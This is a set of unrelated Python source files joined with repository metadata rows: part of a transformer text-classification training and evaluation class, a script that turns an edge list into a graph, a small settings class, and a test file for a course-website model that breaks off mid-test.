epochs_trained -= 1
continue
train_iterator.set_description(f"Epoch {epoch_number + 1} of {args.num_train_epochs}")
batch_iterator = tqdm(
train_dataloader,
desc=f"Running Epoch {epoch_number} of {args.num_train_epochs}",
disable=args.silent,
mininterval=0,
)
for step, batch in enumerate(batch_iterator):
if steps_trained_in_current_epoch > 0:
steps_trained_in_current_epoch -= 1
continue
inputs = self._get_inputs_dict(batch)
if args.fp16:
with amp.autocast():
outputs = model(**inputs)
# model outputs are always tuple in pytorch-transformers (see doc)
loss = outputs[0]
else:
outputs = model(**inputs)
# model outputs are always tuple in pytorch-transformers (see doc)
loss = outputs[0]
if args.n_gpu > 1:
loss = loss.mean() # mean() to average on multi-gpu parallel training
current_loss = loss.item()
if show_running_loss:
batch_iterator.set_description(
f"Epochs {epoch_number}/{args.num_train_epochs}. Running Loss: {current_loss:9.4f}"
)
if args.gradient_accumulation_steps > 1:
loss = loss / args.gradient_accumulation_steps
if args.fp16:
scaler.scale(loss).backward()
else:
loss.backward()
tr_loss += loss.item()
if (step + 1) % args.gradient_accumulation_steps == 0:
if args.fp16:
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)
if args.fp16:
scaler.step(optimizer)
scaler.update()
else:
optimizer.step()
scheduler.step() # Update learning rate schedule
model.zero_grad()
global_step += 1
if args.logging_steps > 0 and global_step % args.logging_steps == 0:
# Log metrics
tb_writer.add_scalar("lr", scheduler.get_lr()[0], global_step)
tb_writer.add_scalar("loss", (tr_loss - logging_loss) / args.logging_steps, global_step)
logging_loss = tr_loss
if args.wandb_project:
wandb.log(
{
"Training loss": current_loss,
"lr": scheduler.get_lr()[0],
"global_step": global_step,
}
)
if args.save_steps > 0 and global_step % args.save_steps == 0:
# Save model checkpoint
output_dir_current = os.path.join(output_dir, "checkpoint-{}".format(global_step))
self._save_model(output_dir_current, optimizer, scheduler, model=model)
if args.evaluate_during_training and (
args.evaluate_during_training_steps > 0
and global_step % args.evaluate_during_training_steps == 0
):
# Only evaluate when single GPU otherwise metrics may not average well
results, _, _ = self.eval_model(
eval_df,
verbose=verbose and args.evaluate_during_training_verbose,
silent=args.evaluate_during_training_silent,
wandb_log=False,
**kwargs,
)
for key, value in results.items():
tb_writer.add_scalar("eval_{}".format(key), value, global_step)
output_dir_current = os.path.join(output_dir, "checkpoint-{}".format(global_step))
if args.save_eval_checkpoints:
self._save_model(output_dir_current, optimizer, scheduler, model=model, results=results)
training_progress_scores["global_step"].append(global_step)
training_progress_scores["train_loss"].append(current_loss)
for key in results:
training_progress_scores[key].append(results[key])
report = pd.DataFrame(training_progress_scores)
report.to_csv(
os.path.join(args.output_dir, "training_progress_scores.csv"), index=False,
)
if args.wandb_project:
wandb.log(self._get_last_metrics(training_progress_scores))
if not best_eval_metric:
best_eval_metric = results[args.early_stopping_metric]
self._save_model(args.best_model_dir, optimizer, scheduler, model=model, results=results)
if best_eval_metric and args.early_stopping_metric_minimize:
if best_eval_metric - results[args.early_stopping_metric] > args.early_stopping_delta:
best_eval_metric = results[args.early_stopping_metric]
self._save_model(
args.best_model_dir, optimizer, scheduler, model=model, results=results
)
early_stopping_counter = 0
else:
if args.use_early_stopping:
if early_stopping_counter < args.early_stopping_patience:
early_stopping_counter += 1
if verbose:
logger.info(f" No improvement in {args.early_stopping_metric}")
logger.info(f" Current step: {early_stopping_counter}")
logger.info(f" Early stopping patience: {args.early_stopping_patience}")
else:
if verbose:
logger.info(f" Patience of {args.early_stopping_patience} steps reached")
logger.info(" Training terminated.")
train_iterator.close()
return global_step, tr_loss / global_step
else:
if results[args.early_stopping_metric] - best_eval_metric > args.early_stopping_delta:
best_eval_metric = results[args.early_stopping_metric]
self._save_model(
args.best_model_dir, optimizer, scheduler, model=model, results=results
)
early_stopping_counter = 0
else:
if args.use_early_stopping:
if early_stopping_counter < args.early_stopping_patience:
early_stopping_counter += 1
if verbose:
logger.info(f" No improvement in {args.early_stopping_metric}")
logger.info(f" Current step: {early_stopping_counter}")
logger.info(f" Early stopping patience: {args.early_stopping_patience}")
else:
if verbose:
logger.info(f" Patience of {args.early_stopping_patience} steps reached")
logger.info(" Training terminated.")
train_iterator.close()
return global_step, tr_loss / global_step
epoch_number += 1
output_dir_current = os.path.join(output_dir, "checkpoint-{}-epoch-{}".format(global_step, epoch_number))
if args.save_model_every_epoch or args.evaluate_during_training:
os.makedirs(output_dir_current, exist_ok=True)
if args.save_model_every_epoch:
self._save_model(output_dir_current, optimizer, scheduler, model=model)
if args.evaluate_during_training:
results, _, _ = self.eval_model(
eval_df,
verbose=verbose and args.evaluate_during_training_verbose,
silent=args.evaluate_during_training_silent,
wandb_log=False,
**kwargs,
)
self._save_model(output_dir_current, optimizer, scheduler, results=results)
training_progress_scores["global_step"].append(global_step)
training_progress_scores["train_loss"].append(current_loss)
for key in results:
training_progress_scores[key].append(results[key])
report = pd.DataFrame(training_progress_scores)
report.to_csv(os.path.join(args.output_dir, "training_progress_scores.csv"), index=False)
if args.wandb_project:
wandb.log(self._get_last_metrics(training_progress_scores))
if not best_eval_metric:
best_eval_metric = results[args.early_stopping_metric]
self._save_model(args.best_model_dir, optimizer, scheduler, model=model, results=results)
if best_eval_metric and args.early_stopping_metric_minimize:
if best_eval_metric - results[args.early_stopping_metric] > args.early_stopping_delta:
best_eval_metric = results[args.early_stopping_metric]
self._save_model(args.best_model_dir, optimizer, scheduler, model=model, results=results)
early_stopping_counter = 0
else:
if args.use_early_stopping and args.early_stopping_consider_epochs:
if early_stopping_counter < args.early_stopping_patience:
early_stopping_counter += 1
if verbose:
logger.info(f" No improvement in {args.early_stopping_metric}")
logger.info(f" Current step: {early_stopping_counter}")
logger.info(f" Early stopping patience: {args.early_stopping_patience}")
else:
if verbose:
logger.info(f" Patience of {args.early_stopping_patience} steps reached")
logger.info(" Training terminated.")
train_iterator.close()
return global_step, tr_loss / global_step
else:
if results[args.early_stopping_metric] - best_eval_metric > args.early_stopping_delta:
best_eval_metric = results[args.early_stopping_metric]
self._save_model(args.best_model_dir, optimizer, scheduler, model=model, results=results)
early_stopping_counter = 0
else:
if args.use_early_stopping and args.early_stopping_consider_epochs:
if early_stopping_counter < args.early_stopping_patience:
early_stopping_counter += 1
if verbose:
logger.info(f" No improvement in {args.early_stopping_metric}")
logger.info(f" Current step: {early_stopping_counter}")
logger.info(f" Early stopping patience: {args.early_stopping_patience}")
else:
if verbose:
logger.info(f" Patience of {args.early_stopping_patience} steps reached")
logger.info(" Training terminated.")
train_iterator.close()
return global_step, tr_loss / global_step
return global_step, tr_loss / global_step
def eval_model(
self, eval_df, multi_label=False, output_dir=None, verbose=True, silent=False, wandb_log=True, **kwargs
):
"""
Evaluates the model on eval_df. Saves results to output_dir.
Args:
eval_df: Pandas Dataframe containing at least two columns. If the Dataframe has a header, it should contain a 'text' and a 'labels' column. If no header is present,
the Dataframe should contain at least two columns, with the first column containing the text, and the second column containing the label. The model will be evaluated on this Dataframe.
output_dir: The directory where model files will be saved. If not given, self.args.output_dir will be used.
verbose: If verbose, results will be printed to the console on completion of evaluation.
silent: If silent, tqdm progress bars will be hidden.
wandb_log: If True, evaluation results will be logged to wandb.
**kwargs: Additional metrics that should be used. Pass in the metrics as keyword arguments (name of metric: function to use). E.g. f1=sklearn.metrics.f1_score.
A metric function should take in two parameters. The first parameter will be the true labels, and the second parameter will be the predictions.
Returns:
result: Dictionary containing evaluation results.
model_outputs: List of model outputs for each row in eval_df
wrong_preds: List of InputExample objects corresponding to each incorrect prediction by the model
""" # noqa: ignore flake8"
if not output_dir:
output_dir = self.args.output_dir
self._move_model_to_device()
result, model_outputs, wrong_preds = self.evaluate(
eval_df, output_dir, multi_label=multi_label, verbose=verbose, silent=silent, wandb_log=wandb_log, **kwargs
)
self.results.update(result)
if verbose:
logger.info(self.results)
return result, model_outputs, wrong_preds
def evaluate(
self, eval_df, output_dir, multi_label=False, prefix="", verbose=True, silent=False, wandb_log=True, **kwargs
):
"""
Evaluates the model on eval_df.
Utility function to be used by the eval_model() method. Not intended to be used directly.
"""
model = self.model
args = self.args
eval_output_dir = output_dir
results = {}
if isinstance(eval_df, str) and self.args.lazy_loading:
eval_dataset = LazyClassificationDataset(eval_df, self.tokenizer, self.args)
eval_examples = None
else:
if self.args.lazy_loading:
raise ValueError("Input must be given as a path to a file when using lazy loading")
if "text" in eval_df.columns and "labels" in eval_df.columns:
eval_examples = [
InputExample(i, text, None, label)
for i, (text, label) in enumerate(zip(eval_df["text"].astype(str), eval_df["labels"]))
]
elif "text_a" in eval_df.columns and "text_b" in eval_df.columns:
eval_examples = [
InputExample(i, text_a, text_b, label)
for i, (text_a, text_b, label) in enumerate(
zip(eval_df["text_a"].astype(str), eval_df["text_b"].astype(str), eval_df["labels"])
)
]
else:
warnings.warn(
"Dataframe headers not specified. Falling back to using column 0 as text and column 1 as labels."
)
eval_examples = [
InputExample(i, text, None, label)
for i, (text, label) in enumerate(zip(eval_df.iloc[:, 0], eval_df.iloc[:, 1]))
]
if args.sliding_window:
eval_dataset, window_counts = self.load_and_cache_examples(
eval_examples, evaluate=True, verbose=verbose, silent=silent
)
else:
eval_dataset = self.load_and_cache_examples(
eval_examples, evaluate=True, verbose=verbose, silent=silent
)
os.makedirs(eval_output_dir, exist_ok=True)
eval_sampler = SequentialSampler(eval_dataset)
eval_dataloader = DataLoader(eval_dataset, sampler=eval_sampler, batch_size=args.eval_batch_size)
eval_loss = 0.0
nb_eval_steps = 0
preds = None
out_label_ids = None
model.eval()
for batch in tqdm(eval_dataloader, disable=args.silent or silent, desc="Running Evaluation"):
# batch = tuple(t.to(device) for t in batch)
with torch.no_grad():
inputs = self._get_inputs_dict(batch)
outputs = model(**inputs)
tmp_eval_loss, logits = outputs[:2]
if multi_label:
logits = logits.sigmoid()
eval_loss += tmp_eval_loss.mean().item()
nb_eval_steps += 1
if preds is None:
preds = logits.detach().cpu().numpy()
out_label_ids = inputs["labels"].detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
out_label_ids = np.append(out_label_ids, inputs["labels"].detach().cpu().numpy(), axis=0)
eval_loss = eval_loss / nb_eval_steps
if args.sliding_window:
count = 0
window_ranges = []
for n_windows in window_counts:
window_ranges.append([count, count + n_windows])
count += n_windows
preds = [preds[window_range[0] : window_range[1]] for window_range in window_ranges]
out_label_ids = [
out_label_ids[i] for i in range(len(out_label_ids)) if i in [window[0] for window in window_ranges]
]
model_outputs = preds
preds = [np.argmax(pred, axis=1) for pred in preds]
final_preds = []
for pred_row in preds:
mode_pred, counts = mode(pred_row)
if len(counts) > 1 and counts[0] == counts[1]:
final_preds.append(args.tie_value)
else:
final_preds.append(mode_pred[0])
preds = np.array(final_preds)
elif not multi_label and args.regression is True:
preds = np.squeeze(preds)
model_outputs = preds
else:
model_outputs = preds
if not multi_label:
preds = np.argmax(preds, axis=1)
result, wrong = self.compute_metrics(preds, out_label_ids, eval_examples, **kwargs)
result["eval_loss"] = eval_loss
results.update(result)
output_eval_file = os.path.join(eval_output_dir, "eval_results.txt")
with open(output_eval_file, "w") as writer:
for key in sorted(result.keys()):
writer.write("{} = {}\n".format(key, str(result[key])))
if self.args.wandb_project and wandb_log and not multi_label and not self.args.regression:
wandb.init(project=args.wandb_project, config={**asdict(args)}, **args.wandb_kwargs)
if not args.labels_map:
self.args.labels_map = {i: i for i in range(self.num_labels)}
labels_list = sorted(list(self.args.labels_map.keys()))
inverse_labels_map = {value: key for key, value in self.args.labels_map.items()}
truth = [inverse_labels_map[out] for out in out_label_ids]
# ROC
wandb.log({"roc": wandb.plots.ROC(truth, model_outputs, labels_list)})
# Precision Recall
wandb.log({"pr": wandb.plots.precision_recall(truth, model_outputs, labels_list)})
# Confusion Matrix
wandb.sklearn.plot_confusion_matrix(
truth, [inverse_labels_map[np.argmax(out)] for out in model_outputs], labels=labels_list,
)
return results, model_outputs, wrong
def load_and_cache_examples(
self, examples, evaluate=False, no_cache=False, multi_label=False, verbose=True, silent=False
):
"""
Converts a list of InputExample objects to a TensorDataset containing InputFeatures. Caches the InputFeatures.
Utility function for train() and eval() methods. Not intended to be used directly.
"""
process_count = self.args.process_count
tokenizer = self.tokenizer
args = self.args
if not no_cache:
no_cache = args.no_cache
if not multi_label and args.regression:
output_mode = "regression"
else:
output_mode = "classification"
if not no_cache:
os.makedirs(self.args.cache_dir, exist_ok=True)
mode = "dev" if evaluate else "train"
cached_features_file = os.path.join(
args.cache_dir,
"cached_{}_{}_{}_{}_{}".format(
mode, args.model_type, args.max_seq_length, self.num_labels, len(examples),
),
)
if os.path.exists(cached_features_file) and (
(not args.reprocess_input_data and not no_cache)
or (mode == "dev" and args.use_cached_eval_features and not no_cache)
):
features = torch.load(cached_features_file)
if verbose:
logger.info(f" Features loaded from cache at {cached_features_file}")
else:
if verbose:
logger.info(" Converting to features started. Cache is not used.")
if args.sliding_window:
logger.info(" Sliding window enabled")
# If labels_map is defined, then labels need to be replaced with ints
if self.args.labels_map:
for example in examples:
if multi_label:
example.label = [self.args.labels_map[label] for label in example.label]
else:
example.label = self.args.labels_map[example.label]
features = convert_examples_to_features(
examples,
args.max_seq_length,
tokenizer,
output_mode,
# XLNet has a CLS token at the end
cls_token_at_end=bool(args.model_type in ["xlnet"]),
cls_token=tokenizer.cls_token,
cls_token_segment_id=2 if args.model_type in ["xlnet"] else 0,
sep_token=tokenizer.sep_token,
# RoBERTa uses an extra separator b/w pairs of sentences,
# cf. github.com/pytorch/fairseq/commit/1684e166e3da03f5b600dbb7855cb98ddfcd0805
sep_token_extra=bool(args.model_type in ["roberta", "camembert", "xlmroberta", "longformer"]),
# PAD on the left for XLNet
pad_on_left=bool(args.model_type in ["xlnet"]),
pad_token=tokenizer.convert_tokens_to_ids([tokenizer.pad_token])[0],
pad_token_segment_id=4 if args.model_type in ["xlnet"] else 0,
process_count=process_count,
multi_label=multi_label,
silent=args.silent or silent,
use_multiprocessing=args.use_multiprocessing,
sliding_window=args.sliding_window,
flatten=not evaluate,
stride=args.stride,
add_prefix_space=bool(args.model_type in ["roberta", "camembert", "xlmroberta", "longformer"]),
args=args,
)
if verbose and args.sliding_window:
logger.info(f" {len(features)} features created from {len(examples)} samples.")
if not no_cache:
torch.save(features, cached_features_file)
if args.sliding_window and evaluate:
features = [
[feature_set] if not isinstance(feature_set, list) else feature_set for feature_set in features
]
window_counts = [len(sample) for sample in features]
features = [feature for feature_set in features for feature in feature_set]
all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)
all_input_mask = torch.tensor([f.input_mask for f in features], dtype=torch.long)
all_segment_ids = torch.tensor([f.segment_ids for f in features], dtype=torch.long)
if output_mode == "classification":
all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.long)
elif output_mode == "regression":
all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.float)
dataset = TensorDataset(all_input_ids, all_input_mask, all_segment_ids, all_label_ids)
if args.sliding_window and evaluate:
return dataset, window_counts
else:
return dataset
def compute_metrics(self, preds, labels, eval_examples=None, multi_label=False, **kwargs):
"""
Computes the evaluation metrics for the model predictions.
Args:
preds: Model predictions
labels: Ground truth labels
eval_examples: List of examples on which evaluation was performed
**kwargs: Additional metrics that should be used. Pass in the metrics as keyword arguments (name of metric: function to use). E.g. f1=sklearn.metrics.f1_score.
A metric function should take in two parameters. The first parameter will be the true labels, and the second parameter will be the predictions.
Returns:
result: Dictionary containing evaluation results. (Matthews correlation coefficient, tp, tn, fp, fn)
wrong: List of InputExample objects corresponding to each incorrect prediction by the model
""" # noqa: ignore flake8"
assert len(preds) == len(labels)
extra_metrics = {}
for metric, func in kwargs.items():
extra_metrics[metric] = func(labels, preds)
mismatched = labels != preds
if eval_examples:
wrong = [i for (i, v) in zip(eval_examples, mismatched) if v.any()]
else:
wrong = ["NA"]
if multi_label:
label_ranking_score = label_ranking_average_precision_score(labels, preds)
return {**{"LRAP": label_ranking_score}, **extra_metrics}, wrong
elif self.args.regression:
return {**extra_metrics}, wrong
mcc = matthews_corrcoef(labels, preds)
if self.model.num_labels == 2:
tn, fp, fn, tp = confusion_matrix(labels, preds, labels=[0, 1]).ravel()
return (
{**{"mcc": mcc, "tp": tp, "tn": tn, "fp": fp, "fn": fn}, **extra_metrics},
wrong,
)
else:
return {**{"mcc": mcc}, **extra_metrics}, wrong
def predict(self, to_predict, multi_label=False):
"""
Performs predictions on a list of text.
Args:
to_predict: A python list of text (str) to be sent to the model for prediction.
Returns:
preds: A python list of the predictions (0 or 1) for each text.
model_outputs: A python list of the raw model outputs for each text.
"""
model = self.model
args = self.args
self._move_model_to_device()
dummy_label = 0 if not self.args.labels_map else next(iter(self.args.labels_map.keys()))
if multi_label:
eval_examples = [
InputExample(i, text, None, [dummy_label for i in range(self.num_labels)])
for i, text in enumerate(to_predict)
]
else:
if isinstance(to_predict[0], list):
eval_examples = [InputExample(i, text[0], text[1], dummy_label) for i, text in enumerate(to_predict)]
else:
eval_examples = [InputExample(i, text, None, dummy_label) for i, text in enumerate(to_predict)]
if args.sliding_window:
eval_dataset, window_counts = self.load_and_cache_examples(eval_examples, evaluate=True, no_cache=True)
else:
eval_dataset = self.load_and_cache_examples(
eval_examples, evaluate=True, multi_label=multi_label, no_cache=True
)
eval_sampler = SequentialSampler(eval_dataset)
eval_dataloader = DataLoader(eval_dataset, sampler=eval_sampler, batch_size=args.eval_batch_size)
eval_loss = 0.0
nb_eval_steps = 0
preds = None
out_label_ids = None
if self.config.output_hidden_states:
for batch in tqdm(eval_dataloader, disable=args.silent, desc="Running Prediction"):
model.eval()
# batch = tuple(t.to(device) for t in batch)
with torch.no_grad():
inputs = self._get_inputs_dict(batch)
outputs = model(**inputs)
tmp_eval_loss, logits = outputs[:2]
embedding_outputs, layer_hidden_states = outputs[2][0], outputs[2][1:]
if multi_label:
logits = logits.sigmoid()
eval_loss += tmp_eval_loss.mean().item()
nb_eval_steps += 1
if preds is None:
preds = logits.detach().cpu().numpy()
out_label_ids = inputs["labels"].detach().cpu().numpy()
all_layer_hidden_states = np.array([state.detach().cpu().numpy() for state in layer_hidden_states])
all_embedding_outputs = embedding_outputs.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
out_label_ids = np.append(out_label_ids, inputs["labels"].detach().cpu().numpy(), axis=0)
all_layer_hidden_states = np.append(
all_layer_hidden_states,
np.array([state.detach().cpu().numpy() for state in layer_hidden_states]),
axis=1,
)
all_embedding_outputs = np.append(
all_embedding_outputs, embedding_outputs.detach().cpu().numpy(), axis=0
)
else:
for batch in tqdm(eval_dataloader, disable=args.silent):
model.eval()
# batch = tuple(t.to(device) for t in batch)
with torch.no_grad():
inputs = self._get_inputs_dict(batch)
outputs = model(**inputs)
tmp_eval_loss, logits = outputs[:2]
if multi_label:
logits = logits.sigmoid()
eval_loss += tmp_eval_loss.mean().item()
nb_eval_steps += 1
if preds is None:
preds = logits.detach().cpu().numpy()
out_label_ids = inputs["labels"].detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
out_label_ids = np.append(out_label_ids, inputs["labels"].detach().cpu().numpy(), axis=0)
eval_loss = eval_loss / nb_eval_steps
if args.sliding_window:
count = 0
window_ranges = []
for n_windows in window_counts:
window_ranges.append([count, count + n_windows])
count += n_windows
preds = [preds[window_range[0] : window_range[1]] for window_range in window_ranges]
model_outputs = preds
preds = [np.argmax(pred, axis=1) for pred in preds]
final_preds = []
for pred_row in preds:
mode_pred, counts = mode(pred_row)
if len(counts) > 1 and counts[0] == counts[1]:
final_preds.append(args.tie_value)
else:
final_preds.append(mode_pred[0])
preds = np.array(final_preds)
elif not multi_label and args.regression is True:
preds = np.squeeze(preds)
model_outputs = preds
else:
model_outputs = preds
if multi_label:
if isinstance(args.threshold, list):
threshold_values = args.threshold
preds = [
[self._threshold(pred, threshold_values[i]) for i, pred in enumerate(example)]
for example in preds
]
else:
preds = [[self._threshold(pred, args.threshold) for pred in example] for example in preds]
else:
preds = np.argmax(preds, axis=1)
if self.args.labels_map and not self.args.regression:
inverse_labels_map = {value: key for key, value in self.args.labels_map.items()}
preds = [inverse_labels_map[pred] for pred in preds]
if self.config.output_hidden_states:
return preds, model_outputs, all_embedding_outputs, all_layer_hidden_states
else:
return preds, model_outputs
def _threshold(self, x, threshold):
if x >= threshold:
return 1
return 0
def _move_model_to_device(self):
self.model.to(self.device)
def _get_inputs_dict(self, batch):
if isinstance(batch[0], dict):
inputs = {key: value.squeeze().to(self.device) for key, value in batch[0].items()}
inputs["labels"] = batch[1].to(self.device)
else:
batch = tuple(t.to(self.device) for t in batch)
inputs = {"input_ids": batch[0], "attention_mask": batch[1], "labels": batch[3]}
# XLM, DistilBERT and RoBERTa don't use segment_ids
if self.args.model_type != "distilbert":
inputs["token_type_ids"] = batch[2] if self.args.model_type in ["bert", "xlnet", "albert"] else None
return inputs
def _get_last_metrics(self, metric_values):
return {metric: values[-1] for metric, values in metric_values.items()}
def _create_training_progress_scores(self, multi_label, **kwargs):
extra_metrics = {key: [] for key in kwargs}
if multi_label:
training_progress_scores = {
"global_step": [],
"LRAP": [],
"train_loss": [],
"eval_loss": [],
**extra_metrics,
}
else:
if self.model.num_labels == 2:
training_progress_scores = {
"global_step": [],
"tp": [],
"tn": [],
"fp": [],
"fn": [],
"mcc": [],
"train_loss": [],
"eval_loss": [],
**extra_metrics,
}
elif self.model.num_labels == 1:
training_progress_scores = {
"global_step": [],
"train_loss": [],
"eval_loss": [],
**extra_metrics,
}
else:
training_progress_scores = {
"global_step": [],
"mcc": [],
"train_loss": [],
"eval_loss": [],
**extra_metrics,
}
return training_progress_scores
def _save_model(self, output_dir=None, optimizer=None, scheduler=None, model=None, results=None):
if not output_dir:
output_dir = self.args.output_dir
os.makedirs(output_dir, exist_ok=True)
if model and not self.args.no_save:
# Take care of distributed/parallel training
model_to_save = model.module if hasattr(model, "module") else model
model_to_save.save_pretrained(output_dir)
self.tokenizer.save_pretrained(output_dir)
torch.save(self.args, os.path.join(output_dir, "training_args.bin"))
if optimizer and scheduler and self.args.save_optimizer_and_scheduler:
torch.save(optimizer.state_dict(), os.path.join(output_dir, "optimizer.pt"))
torch.save(scheduler.state_dict(), os.path.join(output_dir, "scheduler.pt"))
self._save_model_args(output_dir)
if results:
output_eval_file = os.path.join(output_dir, "eval_results.txt")
with open(output_eval_file, "w") as writer:
for key in sorted(results.keys()):
writer.write("{} = {}\n".format(key, str(results[key])))
def _save_model_args(self, output_dir):
os.makedirs(output_dir, exist_ok=True)
self.args.save(output_dir)
def _load_model_args(self, input_dir):
args = ClassificationArgs()
args.load(input_dir)
return args
def get_named_parameters(self):
return [n for n, p in self.model.named_parameters()]
| 45.59827 | 214 | 0.578887 |
ded88f755816af6203933e55d17f2d4dd6251387 | 776 | py | Python | CCscripts/sgToGraph.py | mrvollger/SDA | eba7d36d0cadf9eba42053b7d2a3371247eebe1b | [
"MIT"
] | 21 | 2019-11-11T10:09:47.000Z | 2022-03-28T01:22:12.000Z | CCscripts/sgToGraph.py | mrvollger/SDA | eba7d36d0cadf9eba42053b7d2a3371247eebe1b | [
"MIT"
] | 12 | 2019-11-04T23:30:25.000Z | 2021-12-04T12:49:26.000Z | CCscripts/sgToGraph.py | mrvollger/SDA | eba7d36d0cadf9eba42053b7d2a3371247eebe1b | [
"MIT"
] | 4 | 2019-11-15T09:52:24.000Z | 2021-04-07T16:42:54.000Z | #!/usr/bin/env python
import argparse
import networkx as nx
import ABPUtils
import sys
ap = argparse.ArgumentParser(description="Converg sg_edges_list to graph")
ap.add_argument("input", help="Input file (should be sg_edges_list, but not assuming anything")
ap.add_argument("output", help="Output file. (gml format)")
args = ap.parse_args()
inFile = open(args.input)
if inFile is None:
print "ERROR. Could not open " + args.input
sys.exit(1)
edges = []
vertices = {}
for line in inFile:
v = line.split()
vertices[v[0]] = True
vertices[v[1]] = True
if (v[-1] != "TR"):
edges.append((v[0],v[1]))
g = nx.Graph()
for v in vertices.keys():
g.add_node(v)
for e in edges:
g.add_edge(e[0],e[1])
ABPUtils.WriteGraph(g, args.output)
| 20.972973 | 95 | 0.662371 |
64843030ce2d38f452f0e30806f5241809307e78 | 238 | py | Python | notebooks/__code/metadata_overlapping_images/general_classes.py | mabrahamdevops/python_notebooks | 6d5e7383b60cc7fd476f6e85ab93e239c9c32330 | [
"BSD-3-Clause"
] | null | null | null | notebooks/__code/metadata_overlapping_images/general_classes.py | mabrahamdevops/python_notebooks | 6d5e7383b60cc7fd476f6e85ab93e239c9c32330 | [
"BSD-3-Clause"
] | null | null | null | notebooks/__code/metadata_overlapping_images/general_classes.py | mabrahamdevops/python_notebooks | 6d5e7383b60cc7fd476f6e85ab93e239c9c32330 | [
"BSD-3-Clause"
] | null | null | null |
class ScaleSettings:
x0 = 50
y0 = 50
thickness = 10
cursor_width = 10
cursor_height = 10
color = [255, 255, 255] # white
class MetadataSettings:
x0 = 200
y0 = 200
color = [255, 255, 255] # white
| 13.222222 | 36 | 0.567227 |
3c6d6d288a5896d2c7805bbd972f16365752f82b | 6,465 | py | Python | test_naucse/test_model.py | befeleme/naucse.python.cz | dee2c8cce8db90108b01b40c0981053943352d11 | [
"MIT"
] | 4 | 2019-02-14T08:02:41.000Z | 2020-10-20T10:35:55.000Z | test_naucse/test_model.py | befeleme/naucse.python.cz | dee2c8cce8db90108b01b40c0981053943352d11 | [
"MIT"
] | 71 | 2018-08-26T22:31:39.000Z | 2022-01-20T10:29:23.000Z | test_naucse/test_model.py | befeleme/naucse.python.cz | dee2c8cce8db90108b01b40c0981053943352d11 | [
"MIT"
] | 40 | 2018-08-22T14:44:59.000Z | 2021-09-20T16:11:27.000Z | from pathlib import Path
import os
import pytest
import yaml
from naucse import models
from naucse.edit_info import get_local_repo_info
from test_naucse.conftest import fixture_path, dummy_schema_url_factory
from test_naucse.conftest import assert_yaml_dump, add_test_course
def test_empty_model():
model = models.Root()
assert not model.courses
assert not model.licenses
assert not model.run_years
assert model.get_pks() == {}
with pytest.raises(models.NoURL):
model.get_url()
def test_licenses():
model = models.Root()
model.load_licenses(fixture_path / 'licenses')
assert sorted(model.licenses) == ['cc-by-sa-40', 'cc0']
assert model.licenses['cc0'].slug == 'cc0'
assert model.licenses['cc0'].url.endswith('/publicdomain/zero/1.0/')
assert model.licenses['cc0'].title.endswith('Public Domain Dedication')
assert model.licenses['cc-by-sa-40'].slug == 'cc-by-sa-40'
assert model.licenses['cc-by-sa-40'].url.endswith('/licenses/by-sa/4.0/')
assert model.licenses['cc-by-sa-40'].title.endswith('4.0 International')
def test_dump_empty_model():
model = models.Root(schema_url_factory=dummy_schema_url_factory)
assert_yaml_dump(models.dump(model), 'empty-root.yml')
def test_load_empty_dir():
model = models.Root()
with pytest.raises(FileNotFoundError):
model.load_local_courses(fixture_path / 'empty-directory')
assert not model.courses
def test_no_courses():
"""Loading directory with no courses gives only an empty "lessons" course
"""
model = models.Root()
model.load_local_courses(fixture_path / 'empty-lessons-dir')
assert sorted(model.courses) == ['lessons']
assert not model.courses['lessons'].sessions
assert not model.courses['lessons'].lessons
def test_load_courses():
model = models.Root()
model.load_local_courses(fixture_path / 'minimal-courses')
assert sorted(model.courses) == [
'2019/minimal', 'courses/minimal', 'lessons',
]
assert model.courses['courses/minimal'].title == 'A minimal course'
assert model.courses['courses/minimal'].slug == 'courses/minimal'
assert model.courses['2019/minimal'].title == 'A minimal course'
assert model.courses['2019/minimal'].slug == '2019/minimal'
assert model.courses['lessons'].title == 'Kanonické lekce'
assert model.courses['lessons'].slug == 'lessons'
def test_add_local_course():
model = models.Root()
path = fixture_path / 'minimal-courses'
model.add_course(models.Course.load_local(
parent=model,
path=path,
repo_info=get_local_repo_info(path),
slug='courses/minimal',
))
assert sorted(model.courses) == ['courses/minimal']
assert model.courses['courses/minimal'].title == 'A minimal course'
assert model.courses['courses/minimal'].slug == 'courses/minimal'
def test_dump_local_course(model):
path = fixture_path / 'minimal-courses'
model.add_course(models.Course.load_local(
parent=model,
path=path,
repo_info=get_local_repo_info(path),
slug='courses/minimal',
))
assert_yaml_dump(models.dump(model), 'minimal-root.yml')
course = model.courses['courses/minimal']
assert_yaml_dump(models.dump(course), 'minimal-course.yml')
def test_add_course_from_data():
model = models.Root()
add_test_course(model, 'courses/minimal', {
'title': 'A minimal course',
'sessions': [],
})
assert sorted(model.courses) == ['courses/minimal']
assert model.courses['courses/minimal'].title == 'A minimal course'
assert model.courses['courses/minimal'].slug == 'courses/minimal'
def test_run_years(model):
assert model.run_years == {}
# Add a self-study course. It should not appear in run_years.
add_test_course(model, 'courses/minimal', {
'title': 'A minimal course',
'sessions': [],
})
assert model.run_years == {}
assert sorted(model.courses) == ['courses/minimal']
assert sorted(model.self_study_courses) == ['courses/minimal']
course_minimal = model.courses['courses/minimal']
assert course_minimal.start_date == None
assert course_minimal.end_date == None
# Add a course with a single session. It should appear in its run_year.
add_test_course(model, '2019/single-session', {
'title': 'A course with a single session',
'sessions': [
{
'title': 'One session',
'slug': 'foo',
'date': '2019-01-05',
'materials': [],
},
],
})
assert sorted(model.courses) == ['2019/single-session', 'courses/minimal']
assert sorted(model.self_study_courses) == ['courses/minimal']
course_2019 = model.courses['2019/single-session']
assert course_2019.start_date.year == 2019
assert course_2019.end_date.year == 2019
assert sorted(model.run_years) == [2019]
assert model.run_years[2019] == {'2019/single-session': course_2019}
# Add a course spanning 3 years. Should appear in all run_years it spans.
# (Even if there are no sessions that year.)
add_test_course(model, '2017/multi-year', {
'title': 'A course with sessions in years 2017 and 2019',
'sessions': [
{
'title': 'First session, 2017',
'slug': 'one',
'date': '2017-01-05',
'materials': [],
},
{
'title': 'Last session, 2019',
'slug': 'two',
'date': '2019-01-05',
